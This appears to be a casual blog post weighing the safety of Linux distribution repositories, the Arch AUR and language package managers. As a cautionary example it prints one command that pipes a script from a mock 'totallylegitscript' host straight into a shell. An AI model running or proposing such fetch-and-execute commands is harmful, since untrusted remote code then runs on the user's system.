How safe are your Linux distribution's repositories?

Various Linux distributions package and maintain their own repositories for users to access. They're pretty handy and provide many different programs and updates. But how can we be sure they're safe? Let's explore it in this relatively short article.

Trusting your operating system's vendor usually means relying on the repository for updates. But this reliance isn't foolproof; Threats can exists despite the trust you might have in your distribution's maintainers.

Things can go unnoticed

Just recently, Canonical had to delay the release of Ubuntu 23.10 due to hate speech being found in Ukrainian translations. Of course - good on them for finding it before release. It's just some translation files, what can go wrong?

Generally, it's up to the package maintainers to vet and ensure malicious code doesn't slip past them. It theoretically can happen if the code wasn't thoroughly checked, though I'm not myself sure how often the code check even happens. If they see a "trusted" source such as VLC, do they really check the code as well, every time?

Common bugs are more dangerous than you think

Imagine an update breaking your system due to an update. Has this ever happened to you? It did for me plenty of times. It happens for many Reddit users on /r/archlinux, and even on /r/fedora. For me personally, Fedora has this weird tendency to break due to their updates. Thankfully I never had to start from fresh just yet, but it can happen.

The gist of it? I've never had a Linux virus or malware. But I sure did get my system borked a few times by some updates. Many may be of course attributed to NVIDIA drivers.. but it can happen without them as well.

However, instances of system instability or breakages due to updates can usually be fully recovered from, either by manually restoring to its previous state, waiting for a bugfix, or by tweaking some configurations. It can be kind of a time sink though, especially if it happens at the wrong time.

What about the actual malicious software?

It can happen. A package maintainer can go rogue. Yet so far it has not happened. Probably? Either way, most large distros such as Ubuntu, Fedora or OpenSUSE are ran by reputable companies whose selling points are reliability and security. I'd not try to lose sleep over it with them specifically.

Arch linux's AUR is a little bit more wild on the other hand. Since arch is community driven, there's this common trust built into everybody that somebody has certainly checked the updated source code. The truth is - no matter what anyone tells you, if no one checks it and you don't do it either, then anything goes.

The common advice for arch users is to always check the source of what you're installing and/or reading the PKGBUILD, or only downloading from popular repositories. This is especially true for the AUR, as anyone can orphan and take ownership of old unmaintained (but still working) repositories and hijack them.

Outside of your distribution's repository, you're more likely to get bit by a custom extension/plugin/app that you pulled from Github. Or worse, doing something sketchy like this before checking what the script does:

curl megalegitsite.com/totallylegitscript.sh | sh

Linux package managers are actually pretty solid

The real wild west can be found in your local web development shop. Python's pip or the much worse.. far worse.. NPM. You know what's even worse than that? Most likely over 50% of your time you live in your browser anyway - the wild west where these these web development package managers are used for building the same sites we all browse. Actually, oh shoot! When's the last time some obscure blog you visited updated their Wordpress plugins? Is this turning into a web security rant?!

Anyway - We don't have it that bad at all. In fact, we're doing pretty great. I can still sleep well. As long as I'm far away from my browser.